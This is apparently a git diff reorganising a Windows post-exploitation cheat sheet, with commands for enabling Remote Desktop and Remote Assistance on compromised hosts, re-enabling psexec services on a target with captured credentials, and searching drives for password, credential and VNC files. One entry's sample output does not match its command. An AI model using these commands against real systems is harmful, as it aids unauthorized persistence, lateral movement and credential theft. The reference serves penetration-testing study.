diff --git a/persistence/windows/general.md b/persistence/windows/general.md
index 241ab27..651fbfd 100644
--- a/persistence/windows/general.md
+++ b/persistence/windows/general.md
@@ -13,21 +13,21 @@ return false;
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
+### Remote Assistance Enable
+ * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f`
+ * **Description**: **Must be admin to run this.** Enable remote assistance through adding a registry entry on the local system.
+ * **Output**:
+ * **Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+The operation completed successfully.
-### Enable `psexec`
-The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
-
-
-c:\> net use \\[TargetIP]\ipc$ username /user:password
-c:\> sc \\[TargetIP] config netdde start= auto
-c:\> sc \\[TargetIP] config netddedsdm start= auto
-c:\> sc \\[TargetIP] config clipsrv start= auto
-c:\> sc \\[TargetIP] start netdde
-c:\> sc \\[TargetIP] start netddedsdm
-c:\> sc \\[TargetIP] start clipsrv
-
+### Remote Desktop Enable - Method 1
+ * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f`
+ * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system.
+ * **Output**:
+ * **Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+The operation completed successfully.
-### Enable Remote Desktop
+### Remote Desktop Enable - Method 2
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
diff --git a/pivoting/windows/remote.md b/pivoting/windows/remote.md
index cc95915..ff0d4e1 100644
--- a/pivoting/windows/remote.md
+++ b/pivoting/windows/remote.md
@@ -71,19 +71,19 @@ Commands that move data and files between systems on a network and are usually e
* **Output**:
* **Windows 2008:** Show/Hide
C:\Users\johndoe>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console johndoe 1 Active
rdp-tcp 65536 Listen
-### Remote Assistance Enable
- * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f`
- * **Description**: **Must be admin to run this.** Enable remote assistance through adding a registry entry on the local system.
- * **Output**:
- * **Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-The operation completed successfully.
-
-### Remote Desktop Enable
- * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f`
- * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system.
- * **Output**:
- * **Windows 2008:** Show/Hide
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-The operation completed successfully.
+### psexec
+ * **Command with arguments**: `psexec \\[computername|IP] [cmd]`
+ * **Description**: The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
+
+c:\> net use \\[computername|IP]\ipc$ username /user:password
+c:\> sc \\[computername|IP] config netdde start= auto
+c:\> sc \\[computername|IP] config netddedsdm start= auto
+c:\> sc \\[computername|IP] config clipsrv start= auto
+c:\> sc \\[computername|IP] start netdde
+c:\> sc \\[computername|IP] start netddedsdm
+c:\> sc \\[computername|IP] start clipsrv
+
+ * **Example Command**: `psexec \\1.1.1.1 ipconfig /all` would retrieve the IP settings for the 1.1.1.1 system.
### tasklist
* **Command with arguments**: `tasklist /v /s [computername|IP]`
diff --git a/presence/windows/find_files.md b/presence/windows/find_files.md
index 2dbcb7a..307d48a 100644
--- a/presence/windows/find_files.md
+++ b/presence/windows/find_files.md
@@ -18,7 +18,13 @@ Commands that find files on the filesystem and are usually executed from the con
* **Command with arguments**: `dir /a`
* **Description**: Displays files with specified attributes. Examples: D=Directories, R=Read-only files, H=Hidden files, A=Files ready for archiving, S=System files
* **Output**:
- * **Windows 2008:** Show/Hide
C:\Users\johndoe>dir /a c:\
Volume in drive C has no label. Volume Serial Number is 1A09-5F16
Directory of c:\
01/19/2008 03:45 AM $Recycle.Bin
09/18/2006 04:43 PM 24 autoexec.bat
10/08/2013 10:27 PM Boot
04/11/2009 08:00 AM 333,257 bootmgr
10/08/2013 10:27 PM 8,192 BOOTSECT.BAK
09/18/2006 04:43 PM 10 config.sys
01/19/2008 06:47 AM Documents and Settings [C:\Users]
10/23/2013 07:39 PM 2,460,454,912 pagefile.sys
01/19/2008 04:40 AM PerfLogs
10/08/2013 06:36 PM Program Files
10/08/2013 06:36 PM
10/10/2013 07:59 PM Users
10/23/2013 07:38 PM Windows
5 File(s) 2,460,796,395 bytes
10 Dir(s) 33,311,416,320 bytes free
+ * **Windows 2008:** Show/Hide
C:\Users\johndoe>dir /a c:\
Volume in drive C has no label. Volume Serial Number is 1A09-5F16
Directory of c:\
01/19/2008 03:45 AM $Recycle.Bin
09/18/2006 04:43 PM 24 autoexec.bat
10/08/2013 10:27 PM Boot
04/11/2009 08:00 AM 333,257 bootmgr
10/08/2013 10:27 PM 8,192 BOOTSECT.BAK
09/18/2006 04:43 PM 10 config.sys
01/19/2008 06:47 AM Documents and Settings [C:\Users]
10/23/2013 07:39 PM 2,460,454,912 pagefile.sys
01/19/2008 04:40 AM PerfLogs
10/08/2013 06:36 PM Program Files
10/08/2013 06:36 PM
10/10/2013 07:59 PM Users
10/23/2013 07:38 PM Windows
5 File(s) 2,460,796,395 bytes
10 Dir(s) 33,311,416,320 bytes free
+
+### Searching Sub-directories
+ * **Command with arguments**: `dir /s *[term]*`
+ * **Description**: Searches for the word entered in the [term] section in all sub-directories ofthe current directory.
+ * **Example Terms**: `pass`, `cred`, `vnc`, `.config`, `sysprep.*`
+ * **Attribution**: http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607
### Recursive
* **Command with arguments**: `dir /b /s [directory or filename]`